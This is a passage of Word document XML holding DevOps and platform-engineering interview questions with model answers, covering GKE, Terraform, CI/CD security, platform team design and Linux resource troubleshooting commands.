        <w:t>A: Kept state backends separate per cloud (GCS bucket for GCP resources, S3 for AWS, Azure Storage for Azure) rather than one shared backend, since cross-cloud state coupling adds risk without real benefit, and pinned each provider version explicitly per cloud module to avoid one provider's breaking change forcing an unplanned upgrade across all three. Secrets used each cloud's native secret manager (Secret Manager, Secrets Manager, Key Vault) rather than a single cross-cloud secret store, accessed through cloud-native identity (Workload Identity, IAM roles, Managed Identity) instead of long-lived keys wherever the CI system supported it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q118. Resume deep-dive - DR with Kasten K10: You engineered backup and disaster recovery using Veeam and Kasten K10 for Kubernetes. How would you test that a Kubernetes-native backup actually restores a stateful workload correctly?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A real test means actually restoring the backup into an isolated namespace or cluster and verifying the application starts, connects to its restored storage, and serves correct data - not just confirming the backup job completed successfully, since a backup can complete without being genuinely restorable. Kasten K10 policies were tested on a schedule (not just after initial setup) against representative stateful workloads, checking both the PersistentVolume data integrity and any application-level consistency (like database transaction logs) that a pure disk snapshot might not capture correctly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q119. Resume deep-dive - GCP migration: You reduced deployment effort by 40 percent automating CI/CD with Jenkins, Cloud Build, and Terraform, and supported an on-prem to GCP migration. What was the riskiest part of that migration and how did you de-risk it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The riskiest part was typically data migration and cutover for stateful systems, where downtime and data consistency both matter and can't be easily rolled back. De-risked it by migrating in phases (non-critical services first to validate the pattern), running the on-prem and GCP environments in parallel with data replication before cutover, and rehearsing the cutover procedure in a non-production dry run so the actual cutover window was executing a known-good runbook rather than improvising under time pressure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q120. Current market 2026 - GKE Autopilot vs Standard: For a platform serving 40+ product teams, how would you decide between GKE Autopilot and Standard mode today, and what operational control do you give up with Autopilot?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Autopilot is attractive at that scale because it removes node management entirely (no node pool sizing, patching, or capacity planning) and enforces security best practices by default, which reduces platform team toil significantly. The tradeoff is losing fine-grained control over node configuration - custom DaemonSets, specific machine types, privileged workloads, and certain node-level tuning aren't available - so the decision comes down to whether any team has a genuine requirement Autopilot can't meet; if not, Autopilot's reduced operational burden usually wins at that scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q121. Current market 2026 - Workload Identity Federation: How would you design keyless authentication from GitHub Actions or another CI system to GCP using Workload Identity Federation instead of long-lived service account keys?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Configure a Workload Identity Pool and provider trusting GitHub Actions' OIDC token issuer, map specific claims (repository, branch, environment) to determine which GCP service account the token can impersonate, and have the GitHub Actions workflow request a short-lived, automatically-expiring token instead of storing a service account key as a secret. This eliminates the risk of a leaked long-lived key entirely, since there's no static credential to leak - the trust relationship is verified per-request against GitHub's identity provider.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q122. Current market 2026 - Terraform vs OpenTofu: With Terraform's licensing changes and OpenTofu's rise, how would you evaluate whether to stay on Terraform Enterprise or migrate to OpenTofu for a large enterprise estate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Evaluate based on which Terraform Enterprise-specific features you actually depend on (Sentinel policy as code, private registry, specific enterprise support SLAs) versus what OpenTofu's open-source ecosystem now covers, and weigh the migration effort (state format compatibility is generally fine, but tooling, CI integration, and team familiarity need rework) against the licensing cost and vendor lock-in risk of staying. For a large estate, a careful pilot migration of a few non-critical modules first de-risks the decision before committing the whole estate either way.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q123. Current market 2026 - Gateway API migration: GKE is moving from Ingress to Gateway API. How would you plan a migration from existing Ingress controllers to Gateway API with zero downtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run Gateway API resources alongside existing Ingress objects during migration rather than a hard cutover, migrating one service at a time and validating traffic behavior (routing, TLS, health checks) matches before decommissioning the old Ingress rule for that service. Since Gateway API is more expressive, take the opportunity to consolidate routing logic that may have been split across multiple Ingress annotations into cleaner HTTPRoute resources, and keep the migration reversible per-service until the whole fleet has been validated on Gateway API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q124. Current market 2026 - image signing and provenance: How would you enforce Binary Authorization with Sigstore/cosign-signed images and SLSA provenance before anything deploys to GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Require every image built by CI to be signed with cosign (keyless signing via OIDC is the current best practice, avoiding long-lived signing keys) and attach SLSA provenance attestations describing the build process, then configure Binary Authorization policies on the GKE cluster to reject any image that isn't signed by the trusted CI identity with valid provenance. Roll this out starting in audit/dry-run mode to catch any legitimate images that would be blocked before flipping to enforcing mode, since an overly strict policy applied immediately can block legitimate deployments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q125. Current market 2026 - GKE Dataplane V2: What operational differences would you expect after enabling GKE Dataplane V2 (Cilium-based), especially for network policies and observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Dataplane V2 replaces the traditional iptables-based kube-proxy with an eBPF-based dataplane, which generally improves NetworkPolicy performance and scalability at high pod/service counts and adds richer built-in network observability (flow logs, per-connection visibility) without needing a separate service mesh. Operationally, expect to validate existing NetworkPolicies still behave as expected since eBPF enforcement can differ subtly from iptables in edge cases, and take advantage of the improved visibility to simplify network debugging that previously required manual tcpdump/iptables tracing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q126. Current market 2026 - Config Sync at scale: How would you use Config Sync or Argo CD to enforce consistent policy and configuration across dozens of GKE clusters and thousands of namespaces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structure a hierarchical repo (or ApplicationSet in ArgoCD) so common baseline policies (network policies, resource quotas, RBAC) are defined once and inherited by every cluster/namespace, with narrow, explicit overrides only where a team genuinely needs to differ from the baseline. Use Config Sync's or ArgoCD's drift detection and automatic reconciliation to catch and correct any manual changes automatically, and structure the repo so a platform team change (like a new required label) rolls out everywhere with one commit rather than dozens of manual cluster-by-cluster updates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q127. Current market 2026 - Docker BuildKit: How would you use BuildKit/buildx for multi-arch, cache-efficient, reproducible container builds in a modern CI pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use `docker buildx build --platform linux/amd64,linux/arm64` to produce multi-arch images in one build invocation, and configure BuildKit's cache export/import (`--cache-to`/`--cache-from` against a registry cache) so CI runners share build cache across runs instead of starting cold every time, which significantly speeds up builds. Combine this with pinned base image digests and reproducible dependency installs so the same Dockerfile produces bit-for-bit comparable results (aside from timestamps) across different CI runners and architectures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q128. Current market 2026 - node auto-provisioning: GKE node auto-provisioning versus Standard cluster autoscaler - how would you decide which to use for spiky, mixed CPU/GPU workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Standard cluster autoscaler scales existing, pre-defined node pools up and down, which requires you to have anticipated the right node pool shapes (including a GPU pool) in advance. Node auto-provisioning goes further by automatically creating new node pools with the right machine type/GPU configuration on demand based on pending pod requirements, which fits spiky, unpredictable mixed workloads better since you don't need to pre-provision every possible shape - the tradeoff is slightly less predictability over exactly which machine types will appear in the cluster, so it's worth combining with resource quotas to bound cost.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q129. Current market 2026 - FinOps chargeback: Leadership wants a chargeback/showback model for GKE and Terraform-provisioned infra across 15 teams. How would you design cost attribution without slowing teams down?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enforce required labels (team, cost-center, environment) at the Terraform module level so every resource is attributed automatically at creation time rather than relying on teams to remember to tag things manually, and use GKE namespace-level cost allocation (available via GKE's built-in cost visibility features) to attribute shared cluster costs down to the namespace/team level. Start with showback (visibility only) to build trust in the attribution accuracy before moving to actual chargeback, and keep the tagging requirement enforced by policy (rejecting untagged resources) rather than a manual checklist that erodes over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q130. Current market 2026 - Terraform state at scale: With hundreds of Terraform workspaces, how do you prevent state drift, blast radius, and slow applies as the platform scales past 50 GCP projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Split state into small, purpose-scoped workspaces (per project, per environment, per logical component) rather than one giant state file, so blast radius from any single apply is naturally limited and applies stay fast since each workspace has fewer resources to plan against. Run scheduled drift-detection jobs (`terraform plan` in CI on a cadence, alerting on unexpected diffs) across all workspaces so manual console changes are caught quickly, and use a consistent module structure with remote state data sources for cross-workspace references instead of manually copying values between workspaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q131. Platform team structure: How would you structure a platform engineering team, and what ratio of platform engineers to product teams would you target as the org scales?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structure around clear domains (infrastructure/networking, developer experience/golden paths, observability, security tooling) with each sub-team owning a specific part of the platform rather than one undifferentiated team trying to do everything. A commonly cited starting ratio is roughly 1 platform engineer per 8-12 product engineers, but the right ratio depends heavily on how much self-service automation exists - a more mature, automated platform can support a higher ratio since the team isn't doing manual work per request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q132. You-build-it-you-run-it: How would a platform team enable "you build it, you run it" ownership without every team reinventing observability, security, and deployment tooling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Provide golden-path templates that bake in observability, security controls, and deployment pipelines by default, so teams get production-grade tooling automatically when they use the platform rather than having to build it themselves. The platform team's job is to make the golden path the easiest option, not to mandate it - if opting out is harder than opting in, most teams will naturally consolidate on shared tooling instead of reinventing it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q133. Platform cost visibility: How would you give product teams self-service visibility into their own infrastructure cost inside the developer platform, without building a full FinOps tool from scratch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enforce cost-allocation labels via policy so every resource is attributable to a team, and surface that data through existing tools rather than building new ones - a Looker Studio dashboard or a simple query against the billing export exposed in the internal developer portal, updated daily. Start with visibility (teams see their own spend trend) before adding budgets or enforcement, since visibility alone often drives meaningful behavior change without needing a full FinOps platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q134. Golden path versioning: A golden path template changes and existing services are now out of date. How would you roll out the update and measure adoption without breaking running services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Version the golden path template explicitly (like a package version) so existing services stay pinned to their current version and are not silently broken by an update, and provide a clear, documented upgrade path for teams to opt into the new version on their own schedule. Track adoption via the version each service is running (surfaced in the service catalog), and proactively reach out to teams still on old versions if the update fixes something important like a security issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q135. Platform onboarding: What would the first-day experience look like for a new engineer using your internal developer platform to ship their first service to production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The engineer should be able to scaffold a new service from a golden path template with one command or a self-service UI, get a working CI/CD pipeline, observability, and a staging environment automatically, and deploy to production within their first day or two without filing a single infrastructure ticket. The experience should feel like the platform is doing the undifferentiated heavy lifting so the engineer's first contribution can be actual application logic, not YAML plumbing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q136. Platform team KPIs: What metrics would convince leadership to keep funding a platform engineering team versus letting application teams manage their own infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Track metrics that tie platform investment to business outcomes: time from idea to production deployment, percentage of infrastructure requests self-served versus ticket-driven, incident frequency/MTTR trend across teams using the platform versus those that aren't, and total engineering time saved by not duplicating infrastructure work per team. Frame these as the counterfactual cost of not having the platform - what it would cost if every team rebuilt this capability independently - since that's the comparison leadership actually cares about.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q137. Platform API design: How would you version a platform self-service API so existing automation doesn't break when you add new capabilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use explicit API versioning (URL path or header-based) so breaking changes only affect consumers who opt into the new version, and prefer additive, backward-compatible changes (new optional fields, new endpoints) over modifying existing contracts whenever possible. Maintain a deprecation policy with a clear timeline and communication process for any version you do need to retire, and provide a way for consumers to discover which version they're on and what's changing before it affects them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q138. Linux CPU utilization: How would you check CPU utilization on a Linux server, and which commands would you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use `top` or `htop` for a live, continuously updating view of per-process and overall CPU usage, `mpstat` (from sysstat) for per-core breakdown and historical averages, and `vmstat 1` to see CPU usage alongside run queue length and context switches over time. For a quick one-off snapshot, `uptime` shows load average and `ps aux --sort=-%cpu | head` lists the top CPU-consuming processes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q139. Linux memory usage: What commands would you use to check memory usage on a Linux server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use `free -h` for a quick human-readable summary of total, used, free, and available memory (available is the more meaningful number since it accounts for reclaimable cache), `top`/`htop` for per-process memory usage, and `cat /proc/meminfo` for detailed kernel-level memory statistics. `ps aux --sort=-%mem | head` quickly lists the top memory-consuming processes when hunting for a specific culprit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q140. High CPU troubleshooting: How would you troubleshoot a Linux server with high CPU usage, step by step?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with `top`/`htop` to identify which specific process is consuming CPU, then check whether it's genuinely working (expected load) or stuck (a runaway loop, deadlock) using `strace -p &lt;pid&gt;` or `py-spy`/language-specific profilers to see what it's actually doing. Check `vmstat` for context switch rate and run queue length to see if it's CPU contention across many processes rather than one, and correlate the timing with any recent deployment, traffic increase, or scheduled job before concluding it's a genuine capacity issue versus a code-level regression.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q141. top vs htop: What is the difference between top and htop, and when would you use each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: `top` is available on virtually every Linux system by default and shows a real-time, text-based process list sorted by resource usage, sufficient for quick checks. `htop` is a more user-friendly, often-not-preinstalled alternative with color-coded output, easier sorting/filtering, a visual per-core CPU meter, and the ability to scroll and interact with processes (kill, renice) more intuitively - use `top` when you need something guaranteed to be present, and `htop` when it's available and you want a faster, clearer diagnostic view.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q142. Linux disk usage: How would you check disk usage on a Linux server, and how would you find what is consuming the space?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use `df -h` for a filesystem-level summary of used/available space per mounted volume, and `du -sh /path/* | sort -rh | head` to drill into a specific directory and find which subdirectories are consuming the most space. For finding unexpectedly large individual files, `find / -type f -size +500M` (or similar) locates large files directly, and `lsof | grep deleted` catches the common case of disk space consumed by a large file that was deleted but is still held open by a running process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q143. Linux processes: What is a process in Linux, and how would you find and kill a specific process safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A process is a running instance of a program, identified by a unique PID and tracked by the kernel with its own memory space, open file descriptors, and state. Find it with `ps aux | grep &lt;name&gt;` or `pgrep &lt;name&gt;`, then kill it safely by first sending SIGTERM (`kill &lt;pid&gt;`) which allows the process to shut down gracefully and clean up resources, only escalating to SIGKILL (`kill -9 &lt;pid&gt;`) if it doesn't respond, since SIGKILL gives the process no chance to close files or finish in-flight work cleanly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q144. Load average: What is load average in Linux, and how do you interpret it relative to CPU core count?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Load average is the average number of processes either running on the CPU or waiting for CPU/IO over the last 1, 5, and 15 minutes, shown by `uptime` or `top`. Interpret it relative to core count - a load average of 4 on a 4-core machine means the system is fully utilized with no queueing, while the same load of 4 on a 2-core machine means processes are waiting, indicating the system is oversubscribed; a rising trend across the 1/5/15-minute values signals worsening load, while a falling trend signals recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q145. System monitoring approach: How do you approach monitoring systems in production, and what tools have you used?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Monitor at multiple layers - infrastructure metrics (CPU, memory, disk, network) via Prometheus/Cloud Monitoring, application-level golden signals (latency, traffic, errors, saturation) via custom metrics and dashboards in Grafana, and centralized logging (Cloud Logging/ELK) for deeper investigation when metrics show something's wrong. Alerting is tied to user-impact thresholds and SLOs rather than raw infrastructure numbers, so the team gets paged for things that actually matter rather than every metric fluctuation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q146. Sudden CPU spike: A server's CPU usage suddenly spikes to 100 percent. Walk me through exactly what you would do.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First check `top`/`htop` immediately to identify which process is consuming the CPU and whether it's a single runaway process or broad contention across many. Correlate the spike timing with recent deployments, traffic patterns, or scheduled jobs to form a hypothesis, and if it's actively causing user impact, mitigate first (restart the offending process, scale out, or roll back a recent deploy) before doing deeper root-cause analysis with profiling tools, since restoring service takes priority over fully understanding the cause in the moment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q147. Slow system troubleshooting: A system is running slowly. What steps would you take to troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check the obvious resource dimensions first - CPU (`top`), memory (`free`, checking for swapping), disk I/O (`iostat`), and network (`iftop`/connection counts) - to identify which resource is actually the bottleneck rather than guessing. Check for recent changes (deployments, config changes, traffic growth) that correlate with when the slowness started, and use application-level tracing/logs if infrastructure metrics look healthy, since the slowness may be in application code, a database query, or a downstream dependency rather than the host itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q148. First logs to check: When an incident starts, which logs do you check first, and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with application error logs filtered to the time window the incident began, since they most directly show what's actually failing from the user's perspective. Cross-reference with infrastructure/system logs (kernel messages, OOM killer logs) if the application logs point to a resource issue, and check recent deployment/change logs to see if the incident correlates with a specific release - starting broad (what's failing) before narrowing to why is generally faster than diving straight into low-level system logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q149. DevOps definition: What is DevOps, and what problem does it solve for software teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
